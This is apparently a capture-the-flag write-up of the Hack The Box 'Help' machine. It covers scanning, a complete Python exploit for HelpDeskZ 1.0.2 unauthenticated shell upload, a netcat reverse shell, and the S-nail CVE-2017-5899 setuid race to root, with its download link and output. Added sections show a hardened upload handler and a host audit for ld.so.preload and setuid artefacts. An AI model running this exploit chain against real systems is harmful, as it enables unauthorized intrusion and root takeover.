Enumeration
I started off with a quick Nmap scan on the target.
nmap -sSV -T4 10.10.10.121
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-22 11:20 AEST
Nmap scan report for 10.10.10.121
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3000/tcp open http Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see that there is an Apache service running on port 80. Port 3000 (a Node.js Express application) was slightly more interesting.
I began by running a quick directory enumeration against the service on port 80.
root@kali:~/Desktop/HackTheBox/Help# gobuster -w /usr/share/wordlists/dirb/common.txt -u 10.10.10.121
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.121/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/22 11:43:36 Starting gobuster
=====================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/javascript (Status: 301)
/server-status (Status: 403)
/support (Status: 301)
=====================================================
2019/05/22 11:45:38 Finished
=====================================================
Gobuster discovered /support, which redirected me to the HelpDeskZ application.
Exploitation
A quick Google search on this application revealed a known vulnerability that allows an arbitrary file (shell) upload, which can then be chained into a reverse shell. The published exploit is missing a few characters (like colons); the fixed version is shown below:
#!/usr/bin/python2
import hashlib
import time
import sys
import requests
import datetime

print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'

if len(sys.argv) < 3:
    print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
    sys.exit(1)

helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]

# Read the server's clock from its HTTP Date header so the guessed
# timestamps line up with the time the upload was actually saved.
r = requests.get(helpdeskzBaseUrl)
currentTime = int((datetime.datetime.strptime(r.headers['date'], '%a, %d %b %Y %H:%M:%S %Z') - datetime.datetime(1970,1,1)).total_seconds())

# HelpDeskZ names attachments md5(originalName + uploadTimestamp) with the
# file extension appended, so walk back over the last 300 seconds.
for x in range(0, 300):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext).hexdigest()
    url = helpdeskzBaseUrl+md5hash+'.php'
    response = requests.head(url)
    if response.status_code == 200:
        print "found!"
        print url
        sys.exit(0)
    else:
        print url + ":404"

print "Sorry, I did not find anything"
Following the instructions, I navigated to the following link to upload my shell.
http://10.10.10.121/support/?v=submit_ticket&action=displayForm
I entered random data into the form and selected my shell (named baegmon.php) as the attachment. On submitting the form I was shown an error saying the uploaded file is not allowed; in fact the file is still saved, so the warning can be ignored.
Before executing the exploit, there is one “gotcha”: it requires you to specify the directory that ticket attachments are uploaded to. Combining line 138 of submit_ticket_controller.php with line 18 of global.php gives the ticket upload directory.
Line 138: $uploaddir = UPLOAD_DIR.'tickets/';
Line 018: define('UPLOAD_DIR', ROOTPATH . 'uploads/');
Result: http://host/support/uploads/tickets/
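The two defects that make this upload path exploitable are the guessable file name (md5 of the original name plus the upload timestamp) and the fact that the application reports the file as "not allowed" but stores it anyway. The following is an added example, not HelpDeskZ's code or the writeup's: it models the weak naming scheme beside a hardened handler that rejects disallowed extensions before touching disk and uses an unguessable random name. The allow-list, the `save` callback and the sample inputs are assumptions constructed for the example.

```python
import hashlib
import os
import secrets

# Assumption: an allow-list of attachment types for a ticketing application.
ALLOWED_EXTENSIONS = {".pdf", ".png", ".jpg", ".txt"}


def predictable_name(original_name, unix_time):
    """Weak scheme derived on the page: md5(originalName + uploadTimestamp)
    with the original extension kept. Anyone who knows the file name and
    roughly when it was uploaded can enumerate the stored name."""
    ext = os.path.splitext(original_name)[1].lower()
    digest = hashlib.md5((original_name + str(unix_time)).encode()).hexdigest()
    return digest + ext


def candidate_names(original_name, server_time, window=300):
    """Search space for the weak scheme: one candidate per second in the
    window (the exploit above walks back 300 seconds)."""
    return [predictable_name(original_name, server_time - x) for x in range(window)]


def legacy_handle_upload(original_name, unix_time, save):
    """Behaviour the page describes: the extension check only affects the
    message shown to the user; the file is stored regardless."""
    stored = predictable_name(original_name, unix_time)
    save(stored)  # file written (under the web root) before the check matters
    ext = os.path.splitext(original_name)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return ("File is not allowed", stored)  # warning shown, file kept
    return ("ok", stored)


def hardened_handle_upload(original_name, save):
    """Hardened form: reject before anything reaches disk, name the stored
    file with 128 bits of randomness so it cannot be enumerated, and keep
    the directory outside the web root (assumed path below)."""
    ext = os.path.splitext(original_name)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return ("File is not allowed", None)
    stored = secrets.token_hex(16) + ext
    save(stored)  # assumption: save() writes under /var/lib/helpdesk/attachments, not the web root
    return ("ok", stored)


def demo():
    """Run both handlers on a constructed .php upload and return what each
    actually wrote to disk."""
    legacy_written, hardened_written = [], []
    legacy_result = legacy_handle_upload("baegmon.php", 1558525000, legacy_written.append)
    hardened_result = hardened_handle_upload("baegmon.php", hardened_written.append)
    return {
        "legacy": legacy_result, "legacy_written": legacy_written,
        "hardened": hardened_result, "hardened_written": hardened_written,
        "candidates": len(candidate_names("baegmon.php", 1558525000)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The legacy handler writes a `.php` file with a name any client can reproduce from the original file name and the server's `Date` header; the hardened handler never writes it, and a permitted file gets a name with 2^128 possibilities rather than a few hundred.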
With the file uploaded, I ran the exploit and waited until it was able to successfully create my shell.
== Screen 1 ==
root@kali:~/Desktop/HackTheBox/Help# python exploit.py http://10.10.10.121/support/uploads/tickets/ baegmon.php
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
http://10.10.10.121/support/uploads/tickets/9031654835ec4a4f8350f29e90bc7223.php:404
http://10.10.10.121/support/uploads/tickets/46134c86a55e2ac1004127f1130ddcc7.php:404
http://10.10.10.121/support/uploads/tickets/63f9b3861085c30d310832a3bd86b4ad.php:404
http://10.10.10.121/support/uploads/tickets/9ed2211aa1cfcff9863d04a674a6ad90.php:404
http://10.10.10.121/support/uploads/tickets/fc556c71175dcdd2d934270edf0b4bee.php:404
http://10.10.10.121/support/uploads/tickets/fb194e523fd087dc42cbde5c8168fa46.php:404
== Screen 2 ==
root@kali:~/Desktop/HackTheBox/Help# nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.15.176] from (UNKNOWN) [10.10.10.121] 37994
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
09:16:49 up 14 min, 0 users, load average: 0.00, 0.01, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$
With shell access on the system, I used Python to upgrade the dumb shell to an interactive bash shell and obtained the user flag.
$ python -c 'import pty; pty.spawn("/bin/bash")'
help@help:/$
help@help:/home$ cd /home/help && cat user.txt
cd /home/help && cat user.txt
bb8**************************6af
Privilege Escalation
I started with some quick enumeration on the system, looking for SUID/SGID binaries, and discovered an interesting one.
help@help:/home/help$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
...
/usr/lib/s-nail/s-nail-privsep
...
I was also running enumeration scripts in the background. Linux Exploit Suggester flagged the following:
help@help:/tmp$ ./les.sh
Available information:
Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04.5
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
71 kernel space exploits
39 user space exploits
Possible Exploits:
...
[+] [CVE-2017-5899] s-nail-privget
Details: https://www.openwall.com/lists/oss-security/2017/01/27/7
Tags: [ ubuntu=16.04 ],manjaro=16.10
Rank: 3
Download URL: https://www.openwall.com/lists/oss-security/2017/01/27/7/1
ext-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh
Comments: Distros use own versioning scheme. Manual verification needed.
...
The exploit makes use of a directory traversal vulnerability in S-nail's setuid root helper binary to gain root privileges. Armed with this knowledge, I obtained the exploit, uploaded it to the system and triggered it.
help@help:/tmp$ ./exploit.sh
[~] Found privsep: /usr/lib/s-nail/s-nail-privsep
[.] Compiling /var/tmp/.snail.so.c ...
[.] Compiling /var/tmp/.sh.c ...
[.] Compiling /var/tmp/.privget.c ...
[.] Adding /var/tmp/.snail.so to /etc/ld.so.preload ...
[=] s-nail-privsep local root by @wapiflapi
[.] Started flood in /etc/ld.so.preload
[.] Started race with /usr/lib/s-nail/s-nail-privsep
[.] This could take a while...
[.] Race #1 of 1000 ...
This is a helper program of "s-nail" (in /usr/bin).
It is capable of gaining more privileges than "s-nail"
and will be used to create lock files.
It's sole purpose is outsourcing of high privileges into
fewest lines of code in order to reduce attack surface.
It cannot be run by itself.
-- snip --
[.] Race #306 of 1000 ...
This is a helper program of "s-nail" (in /usr/bin).
It is capable of gaining more privileges than "s-nail"
and will be used to create lock files.
It's sole purpose is outsourcing of high privileges into
fewest lines of code in order to reduce attack surface.
It cannot be run by itself.
[.] Race #307 of 1000 ...
[+] got root! /var/tmp/.sh (uid=0 gid=0)
[.] Cleaning up...
[+] Success:
-rwsr-xr-x 1 root root 6336 May 21 20:45 /var/tmp/.sh
[.] Launching root shell: /var/tmp/.sh
# whoami
root
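From the defender's side, the exploit output above leaves two artefacts that are easy to check for: an entry added to /etc/ld.so.preload pointing at a library in /var/tmp, and a root-owned setuid shell left in /var/tmp. The following is an added example, not part of the writeup or the exploit: a small host audit that parses `ls -l` style lines for the setuid bit and inspects ld.so.preload content. The sample listing, the baseline set and the list of world-writable directories are constructed assumptions.

```python
# Assumption: the usual sticky, world-writable temp directories.
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed sample inputs, modelled on the exploit output above.
SAMPLE_PRELOAD = "/var/tmp/.snail.so\n"
SAMPLE_LS = [
    "-rwsr-xr-x 1 root root   54256 May 16  2017 /usr/bin/passwd",
    "-rwsr-xr-x 1 root root   10240 Jan  1  2017 /usr/lib/s-nail/s-nail-privsep",
    "-rwsr-xr-x 1 root root    6336 May 21 20:45 /var/tmp/.sh",
]
# Assumption: setuid files expected on a clean image of this host.
BASELINE_SUID = {"/usr/bin/passwd", "/usr/lib/s-nail/s-nail-privsep"}


def preload_findings(preload_text):
    """Classify each entry of /etc/ld.so.preload. On a stock Ubuntu host the
    file is normally absent or empty, so any entry deserves a look; entries
    under a world-writable directory or hidden dotfiles are the pattern the
    exploit output shows."""
    findings = []
    for raw in preload_text.splitlines():
        entry = raw.strip()
        if not entry or entry.startswith("#"):
            continue
        if entry.startswith(WORLD_WRITABLE_DIRS):
            findings.append((entry, "preload library lives in a world-writable directory"))
        elif entry.rsplit("/", 1)[-1].startswith("."):
            findings.append((entry, "hidden (dot-prefixed) preload library"))
        else:
            findings.append((entry, "ld.so.preload entry present; verify package ownership"))
    return findings


def parse_ls_line(line):
    """Parse one `ls -l` line into (path, owner, setuid). The owner-execute
    column (index 3 of the permission string) reads 's' or 'S' when the
    setuid bit is set."""
    fields = line.split(None, 8)
    if len(fields) < 9:
        raise ValueError("not an ls -l line: %r" % line)
    perms, owner, path = fields[0], fields[2], fields[8]
    return path, owner, perms[3] in "sS"


def suid_findings(ls_lines, baseline):
    """Flag setuid files that are not in the baseline; a root-owned setuid
    file in a temp directory is the classic left-behind root shell."""
    findings = []
    for line in ls_lines:
        path, owner, setuid = parse_ls_line(line)
        if not setuid or path in baseline:
            continue
        if owner == "root" and path.startswith(WORLD_WRITABLE_DIRS):
            findings.append((path, "root-owned setuid file in a world-writable directory"))
        else:
            findings.append((path, "setuid file not in baseline"))
    return findings


def audit(preload_text, ls_lines, baseline):
    """Combine both checks into one report."""
    return {"ld.so.preload": preload_findings(preload_text),
            "setuid": suid_findings(ls_lines, baseline)}


if __name__ == "__main__":
    for check, hits in audit(SAMPLE_PRELOAD, SAMPLE_LS, BASELINE_SUID).items():
        for path, reason in hits:
            print("%s: %s (%s)" % (check, path, reason))
```

On a live host the inputs would come from `cat /etc/ld.so.preload` and `find / -perm -4000 -type f -exec ls -l {} +`; the baseline is best taken from a clean build of the same image, because a packaged setuid helper such as s-nail-privsep is legitimate on disk and the question is whether it is at a vulnerable version, not whether it exists.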
With root privileges obtained, the only thing left was to obtain the flag!
# cat /root/root.txt
b7f***************************b98
#